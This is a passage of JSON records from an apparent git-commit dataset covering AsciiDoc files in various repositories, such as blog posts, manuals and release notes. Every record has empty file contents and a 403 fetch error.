inja,dpwright\/ninja,bradking\/ninja,kissthink\/ninja,mutac\/ninja,mgaunard\/ninja,Ju2ender\/ninja,dabrahams\/ninja,autopulated\/ninja,fifoforlifo\/ninja,sxlin\/dist_ninja,vvvrrooomm\/ninja,maruel\/ninja,dpwright\/ninja,yannicklm\/ninja,ninja-build\/ninja,ilor\/ninja,mdempsky\/ninja,ThiagoGarciaAlves\/ninja,lizh06\/ninja,drbo\/ninja,mdempsky\/ninja,ndsol\/subninja,ignatenkobrain\/ninja,ThiagoGarciaAlves\/ninja,purcell\/ninja,glensc\/ninja,yannicklm\/ninja,guiquanz\/ninja,moroten\/ninja,dorgonman\/ninja,nocnokneo\/ninja,Ju2ender\/ninja,sgraham\/ninja,jhanssen\/ninja,lizh06\/ninja,atetubou\/ninja,synaptek\/ninja,pck\/ninja,mydongistiny\/ninja,ilor\/ninja,dorgonman\/ninja,sxlin\/dist_ninja,ctiller\/ninja,juntalis\/ninja,kimgr\/ninja,dendy\/ninja,sorbits\/ninja,glensc\/ninja,ndsol\/subninja,sgraham\/ninja,moroten\/ninja,nickhutchinson\/ninja,metti\/ninja,Ju2ender\/ninja,bmeurer\/ninja,ikarienator\/ninja,synaptek\/ninja,ThiagoGarciaAlves\/ninja,atetubou\/ninja,dorgonman\/ninja,dendy\/ninja,sxlin\/dist_ninja,jhanssen\/ninja,AoD314\/ninja,drbo\/ninja,dabrahams\/ninja,fuchsia-mirror\/third_party-ninja,moroten\/ninja,pathscale\/ninja,nafest\/ninja,ikarienator\/ninja,TheOneRing\/ninja,jendrikillner\/ninja,glensc\/ninja,Maratyszcza\/ninja-pypi,bmeurer\/ninja,kissthink\/ninja,mutac\/ninja,fifoforlifo\/ninja,nicolasdespres\/ninja,liukd\/ninja,automeka\/ninja,metti\/ninja,kimgr\/ninja,autopulated\/ninja,syntheticpp\/ninja,jendrikillner\/ninja,liukd\/ninja,nafest\/ninja,yannicklm\/ninja,nafest\/ninja,lizh06\/ninja,drbo\/ninja,martine\/ninja,guiquanz\/ninja,ninja-build\/ninja,purcell\/ninja,dendy\/ninja,martine\/ninja,bradking\/ninja,automeka\/ninja,guiquanz\/ninja,dpwright\/ninja,autopulated\/ninja,pck\/ninja,jhanssen\/ninja,sgraham\/ninja,jhanssen\/ninja,nickhutchinson\/ninja,AoD314\/ninja,martine\/ninja,liukd\/ninja,maruel\/ninja,fifoforlifo\/ninja,bradking\/ninja,purcell\/ninja,iwadon\/ninja,nicolasdespres\/ninja,rnk\/ninja,jsternberg\/ninja,sorbits\/ninja,juntalis\/ninja,kimgr\/ninja,AoD314\/ninja,nico\/ninja,nico\/ninja,mutac\/ninja,automeka\/ninja,juntalis\/ninja,ilor\/ninja,ninja-build\/ninja,nocnokneo\/ninja,dpwright\/ninja,automeka\/ninja,nafest\/ninja,mdempsky\/ninja,sgraham\/ninja,mohamed\/ninja,rjogrady\/ninja,jsternberg\/ninja,Qix-\/ninja,ThiagoGarciaAlves\/ninja,bradking\/ninja,jendrikillner\/ninja,pathscale\/ninja,kissthink\/ninja,dendy\/ninja,rjogrady\/ninja,Maratyszcza\/ninja-pypi,rjogrady\/ninja,mdempsky\/ninja,syntheticpp\/ninja,atetubou\/ninja,bmeurer\/ninja,ikarienator\/ninja,autopulated\/ninja,Maratyszcza\/ninja-pypi,juntalis\/ninja,mohamed\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lizh06\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"488050f9b24bb8b13cbbf442d8950e793d8a5d64","subject":"Update 2017-03-07-Continous-Integration-Testing-with-TFS-Build-2013-N-Uit-and-SQL-Server-Database-dacpacs.adoc","message":"Update 2017-03-07-Continous-Integration-Testing-with-TFS-Build-2013-N-Uit-and-SQL-Server-Database-dacpacs.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-03-07-Continous-Integration-Testing-with-TFS-Build-2013-N-Uit-and-SQL-Server-Database-dacpacs.adoc","new_file":"_posts\/2017-03-07-Continous-Integration-Testing-with-TFS-Build-2013-N-Uit-and-SQL-Server-Database-dacpacs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dannylane\/dannylane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8516eec3368e560e29f776737c8f7f2c07753e96","subject":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","message":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b404fa406bb23173f7ce9abb1cc016d35aeab33c","subject":"Update User Guide","message":"Update User Guide\n","repos":"CS2103R-Eugene-Peh\/addressbook-level4,se-edu\/addressbook-level3,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4","old_file":"docs\/UserGuide.adoc","new_file":"docs\/UserGuide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level3.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02d9578406c955d70a59c6676c044dac42e0d9bd","subject":"release notes: some edits","message":"release notes: some edits\n\n- Some small wording improvements\n- Moved 3-4-3 replication to new features since it seems large enough to\n not just be an \"improvement\"\n- Added a note that the 3-disks-per-replica change only affects new\n replicas\n- Stopped documenting the experimental flag which goes back to 3-2-3\n replication since we'd like to remove it in the future, and we don't\n know of any compelling reasons for someone to change it.\n- Moved KUDU-2259 to \"fixed issues\" since it was seen as a bug\n- Added a few explanations of the results of some fixes instead of the\n implementations.\n\nChange-Id: I944a302a7fe5c86d0204545157efb92407573e1e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9703\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"612ba5e8b5c9a0bc2b899d16b89f388ee309a007","subject":"Update 2017-11-06-api-blueprint.adoc","message":"Update 2017-11-06-api-blueprint.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-api-blueprint.adoc","new_file":"_posts\/2017-11-06-api-blueprint.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"970255ee756d6f015b65329aed3ec418526e5d94","subject":"Update 2019-11-17-poetry-as-art.adoc","message":"Update 2019-11-17-poetry-as-art.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-17-poetry-as-art.adoc","new_file":"_posts\/2019-11-17-poetry-as-art.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39f43d000ee441df5090d85f33b8ed0b53e95f15","subject":"Update 2017-01-28-Why-I-want-to-become-a-Machine-Learning-Engineer.adoc","message":"Update 2017-01-28-Why-I-want-to-become-a-Machine-Learning-Engineer.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-01-28-Why-I-want-to-become-a-Machine-Learning-Engineer.adoc","new_file":"_posts\/2017-01-28-Why-I-want-to-become-a-Machine-Learning-Engineer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbc5efdf7a1365297d9321ac17c49489e0a4cced","subject":"Initial commit","message":"Initial commit\n","repos":"asciidoctor\/asciidoctor-doctest,rahmanusta\/asciidoctor-doctest,rahmanusta\/asciidoctor-doctest,asciidoctor\/asciidoctor-doctest","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahmanusta\/asciidoctor-doctest.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bb4f011dc159aeb48c4e8253de2db4b703cade1","subject":"Update 2016-08-13-2016-08-12.adoc","message":"Update 2016-08-13-2016-08-12.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-13-2016-08-12.adoc","new_file":"_posts\/2016-08-13-2016-08-12.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b94f3d5bf887239b8f3f58b5e356b2ac3bd90716","subject":"Update 2017-04-05-nuovo-test.adoc","message":"Update 2017-04-05-nuovo-test.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-05-nuovo-test.adoc","new_file":"_posts\/2017-04-05-nuovo-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81fd99d67a2757f469e98a634aa9cad1f180def1","subject":"First draft of Omni UTXO management proposal","message":"First draft of Omni UTXO management proposal\n","repos":"OmniLayer\/OmniJ,OmniLayer\/OmniJ,OmniLayer\/OmniJ","old_file":"doc\/omni-utxo-management.adoc","new_file":"doc\/omni-utxo-management.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OmniLayer\/OmniJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b78036fb28adf0e7ecf13a5c8f433902b029dfaa","subject":"y2b create post LG Google Nexus 4 Unboxing","message":"y2b create post LG Google Nexus 4 Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-18-LG-Google-Nexus-4-Unboxing.adoc","new_file":"_posts\/2012-11-18-LG-Google-Nexus-4-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c2354c03b7cc80069d7fad6bfd2eab6c248e1a3","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0006ce60cf1c3412ac0964908cc21c1e17238e6","subject":"Page completed","message":"Page completed\n","repos":"taoguan\/incubator-groovy,genqiang\/incubator-groovy,taoguan\/incubator-groovy,avafanasiev\/groovy,aim-for-better\/incubator-groovy,alien11689\/groovy-core,traneHead\/groovy-core,rabbitcount\/incubator-groovy,EPadronU\/incubator-groovy,paulk-asert\/groovy,shils\/groovy,bsideup\/incubator-groovy,nobeans\/incubator-groovy,samanalysis\/incubator-groovy,adjohnson916\/incubator-groovy,sagarsane\/groovy-core,alien11689\/groovy-core,apache\/incubator-groovy,bsideup\/incubator-groovy,nobeans\/incubator-groovy,PascalSchumacher\/incubator-groovy,upadhyayap\/incubator-groovy,rabbitcount\/incubator-groovy,nkhuyu\/incubator-groovy,russel\/incubator-groovy,taoguan\/incubator-groovy,christoph-frick\/groovy-core,antoaravinth\/incubator-groovy,rlovtangen\/groovy-core,rlovtangen\/groovy-core,alien11689\/incubator-groovy,eginez\/incubator-groovy,gillius\/incubator-groovy,rlovtangen\/groovy-core,jwagenleitner\/groovy,bsideup\/incubator-groovy,groovy\/groovy-core,ChanJLee\/incubator-groovy,EPadronU\/incubator-groovy,i55ac\/incubator-groovy,paulk-asert\/groovy,paplorinc\/incubator-groovy,adjohnson916\/incubator-groovy,kenzanmedia\/incubator-groovy,alien11689\/groovy-core,nkhuyu\/incubator-groovy,groovy\/groovy-core,paulk-asert\/incubator-groovy,avafanasiev\/groovy,armsargis\/groovy,paulk-asert\/groovy,pledbrook\/incubator-groovy,genqiang\/incubator-groovy,upadhyayap\/incubator-groovy,gillius\/incubator-groovy,jwagenleitner\/incubator-groovy,pickypg\/incubator-groovy,i55ac\/incubator-groovy,paulk-asert\/incubator-groovy,ebourg\/groovy-core,gillius\/incubator-groovy,sagarsane\/incubator-groovy,kenzanmedia\/incubator-groovy,yukangguo\/incubator-groovy,paulk-asert\/incubator-groovy,aim-for-better\/incubator-groovy,taoguan\/incubator-groovy,mariogarcia\/groovy-core,aaronzirbes\/incubator-groovy,nkhuyu\/incubator-groovy,pledbrook\/incubator-groovy,i55ac\/incubator-groovy,aaronzirbes\/incubator-groovy,eginez\/incubator-groovy,paulk-asert\/incubator-groovy,sagarsane\/groovy-core,kenzanmedia\/incubator-groovy,bsideup\/groovy-core,nobeans\/incubator-groovy,kidaa\/incubator-groovy,avafanasiev\/groovy,traneHead\/groovy-core,alien11689\/groovy-core,yukangguo\/incubator-groovy,shils\/incubator-groovy,paplorinc\/incubator-groovy,christoph-frick\/groovy-core,apache\/groovy,tkruse\/incubator-groovy,armsargis\/groovy,guangying945\/incubator-groovy,tkruse\/incubator-groovy,pickypg\/incubator-groovy,upadhyayap\/incubator-groovy,aaronzirbes\/incubator-groovy,jwagenleitner\/incubator-groovy,bsideup\/incubator-groovy,bsideup\/groovy-core,russel\/incubator-groovy,russel\/groovy,shils\/incubator-groovy,shils\/groovy,antoaravinth\/incubator-groovy,christoph-frick\/groovy-core,fpavageau\/groovy,sagarsane\/groovy-core,samanalysis\/incubator-groovy,jwagenleitner\/incubator-groovy,alien11689\/incubator-groovy,alien11689\/groovy-core,adjohnson916\/groovy-core,rabbitcount\/incubator-groovy,nkhuyu\/incubator-groovy,bsideup\/groovy-core,ebourg\/incubator-groovy,antoaravinth\/incubator-groovy,russel\/groovy,eginez\/incubator-groovy,yukangguo\/incubator-groovy,aim-for-better\/incubator-groovy,apache\/groovy,antoaravinth\/incubator-groovy,nobeans\/incubator-groovy,genqiang\/incubator-groovy,guangying945\/incubator-groovy,ebourg\/groovy-core,adjohnson916\/groovy-core,mariogarcia\/groovy-core,aim-for-better\/incubator-groovy,dpolivaev\/groovy,graemerocher\/incubator-groovy,paulk-asert\/incubator-groovy,kidaa\/incubator-groovy,apache\/incubator-groovy,gillius\/incubator-groovy,i55ac\/incubator-groovy,rlovtangen\/groovy-core,pledbrook\/incubator-groovy,fpavageau\/groovy,groovy\/groovy-core,paplorinc\/incubator-groovy,dpolivaev\/groovy,ebourg\/incubator-groovy,groovy\/groovy-core,yukangguo\/incubator-groovy,groovy\/groovy-core,adjohnson916\/groovy-core,adjohnson916\/groovy-core,graemerocher\/incubator-groovy,pledbrook\/incubator-groovy,tkruse\/incubator-groovy,sagarsane\/incubator-groovy,tkruse\/incubator-groovy,russel\/incubator-groovy,pickypg\/incubator-groovy,apache\/groovy,paulk-asert\/groovy,armsargis\/groovy,traneHead\/groovy-core,russel\/groovy,christoph-frick\/groovy-core,adjohnson916\/groovy-core,traneHead\/groovy-core,kenzanmedia\/incubator-groovy,graemerocher\/incubator-groovy,apache\/incubator-groovy,adjohnson916\/incubator-groovy,PascalSchumacher\/incubator-groovy,PascalSchumacher\/incubator-groovy,alien11689\/incubator-groovy,ChanJLee\/incubator-groovy,sagarsane\/groovy-core,shils\/groovy,fpavageau\/groovy,avafanasiev\/groovy,sagarsane\/incubator-groovy,EPadronU\/incubator-groovy,ChanJLee\/incubator-groovy,dpolivaev\/groovy,pickypg\/incubator-groovy,bsideup\/groovy-core,mariogarcia\/groovy-core,sagarsane\/groovy-core,sagarsane\/incubator-groovy,samanalysis\/incubator-groovy,adjohnson916\/incubator-groovy,armsargis\/groovy,jwagenleitner\/incubator-groovy,samanalysis\/incubator-groovy,genqiang\/incubator-groovy,ebourg\/incubator-groovy,fpavageau\/groovy,aaronzirbes\/incubator-groovy,paplorinc\/incubator-groovy,mariogarcia\/groovy-core,jwagenleitner\/groovy,jwagenleitner\/groovy,russel\/incubator-groovy,rabbitcount\/incubator-groovy,guangying945\/incubator-groovy,upadhyayap\/incubator-groovy,apache\/groovy,eginez\/incubator-groovy,ebourg\/groovy-core,PascalSchumacher\/incubator-groovy,shils\/groovy,PascalSchumacher\/incubator-groovy,shils\/incubator-groovy,alien11689\/incubator-groovy,kidaa\/incubator-groovy,shils\/incubator-groovy,jwagenleitner\/groovy,dpolivaev\/groovy,russel\/groovy,apache\/incubator-groovy,mariogarcia\/groovy-core,EPadronU\/incubator-groovy,ebourg\/groovy-core,graemerocher\/incubator-groovy,rlovtangen\/groovy-core,ebourg\/incubator-groovy,ebourg\/groovy-core,christoph-frick\/groovy-core,ChanJLee\/incubator-groovy,guangying945\/incubator-groovy,kidaa\/incubator-groovy","old_file":"src\/spec\/doc\/version-scheme.adoc","new_file":"src\/spec\/doc\/version-scheme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kidaa\/incubator-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7660b1c287faa334662caeefc68e5f50c24b1b3d","subject":"y2b create post The Wood Log Of Mystery...","message":"y2b create post The Wood Log Of Mystery...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-11-The-Wood-Log-Of-Mystery.adoc","new_file":"_posts\/2016-02-11-The-Wood-Log-Of-Mystery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bab2a2ac57fa29de891b06338705d4b3903d02cc","subject":"Update 2017-10-05-making-L-A-M-P-by-A-W-S.adoc","message":"Update 2017-10-05-making-L-A-M-P-by-A-W-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-05-making-L-A-M-P-by-A-W-S.adoc","new_file":"_posts\/2017-10-05-making-L-A-M-P-by-A-W-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d0f1af63e14e520cb08e00e78ffb8f2e7999984","subject":"Update 2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60fe80f42f9cf5ca25756712cce977bebe157d96","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e2298c259c1c2b89bf95ae4be2f42d6f79e0aa7","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-bus,spring-cloud\/spring-cloud-bus","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-bus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c8f5971ebefd4597b302aec3e4e1569299b2177","subject":"Added (empty) examples ascii doc file.","message":"Added (empty) examples ascii doc file.\n","repos":"syzer\/incubator-tamaya,salyh\/incubator-tamaya,marschall\/incubator-tamaya,syzer\/incubator-tamaya,marschall\/incubator-tamaya,apache\/incubator-tamaya,salyh\/incubator-tamaya,salyh\/incubator-tamaya,apache\/incubator-tamaya,apache\/incubator-tamaya,syzer\/incubator-tamaya,marschall\/incubator-tamaya","old_file":"docs\/src\/main\/asciidoc\/examples.adoc","new_file":"docs\/src\/main\/asciidoc\/examples.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marschall\/incubator-tamaya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0641c8328615eb6732efd0fba64ee39801d3a77","subject":"Update code documentation","message":"Update code documentation\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"zsdoc\/zplugin.zsh.adoc","new_file":"zsdoc\/zplugin.zsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06997c78a67d4be837da0d544e909611bde899f3","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6cc0109dbc74f1582661f346b67c0f8113ef549","subject":"Update 2019-01-31-Blog-Servers.adoc","message":"Update 2019-01-31-Blog-Servers.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-Blog-Servers.adoc","new_file":"_posts\/2019-01-31-Blog-Servers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"318ac257c3c87ec6a8cc9b09777c9377dcd6a622","subject":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","message":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"beb1a21a78ea36f158d6afb215fe980e109c3c29","subject":"Update 2017-10-03-Episode-113-Save-The-Pinball-For-Last.adoc","message":"Update 2017-10-03-Episode-113-Save-The-Pinball-For-Last.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-10-03-Episode-113-Save-The-Pinball-For-Last.adoc","new_file":"_posts\/2017-10-03-Episode-113-Save-The-Pinball-For-Last.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f2d86ee3cdc283133df3c964e49ff1c25652d2a","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"970c48550b08d75d46d2425873c0175fd6aba71f","subject":"Create newcpp.adoc","message":"Create newcpp.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/newcpp.adoc","new_file":"_posts\/newcpp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e571dc7ba52473cc3e3c766d0db5c084fea74204","subject":"More work on the user guide","message":"More work on the user guide\n\ngit-svn-id: 10bc45916fe30ae642aa5037c9a4b05727bba413@1844782 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"apache\/wss4j,apache\/wss4j","old_file":"src\/site\/asciidoc\/config.adoc","new_file":"src\/site\/asciidoc\/config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/wss4j.git\/': The requested URL returned error: 